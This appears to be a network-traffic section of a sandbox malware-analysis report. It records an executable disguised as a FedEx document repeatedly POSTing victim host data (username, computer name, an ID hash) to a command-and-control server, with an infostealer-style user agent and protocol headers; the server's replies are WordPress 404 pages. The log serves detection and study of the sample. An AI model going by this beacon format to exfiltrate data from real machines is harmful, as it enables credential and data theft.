May 22, 2024 22:02:56.394288063 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:56.395220995 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:56.397362947 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:56.397381067 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:56.402370930 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:56.404228926 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:56.404256105 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:56.408179045 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:02:56.408204079 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:02:56.412518978 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49735	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:56.560138941 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:56.608372927 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:00.190201044 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:57 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:00.191054106 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:00.192956924 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:00.194914103 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:00.194926023 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:00.198805094 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:00.198817015 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 22, 2024 22:03:00.200778008 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 22, 2024 22:03:00.200789928 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:03:00.200800896 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:00.206235886 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:57 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49736	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:00.355562925 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:00.408399105 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:03.802633047 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:00 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:03.803989887 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:03.805645943 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:03.805660963 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:03.808877945 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:03.810549021 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
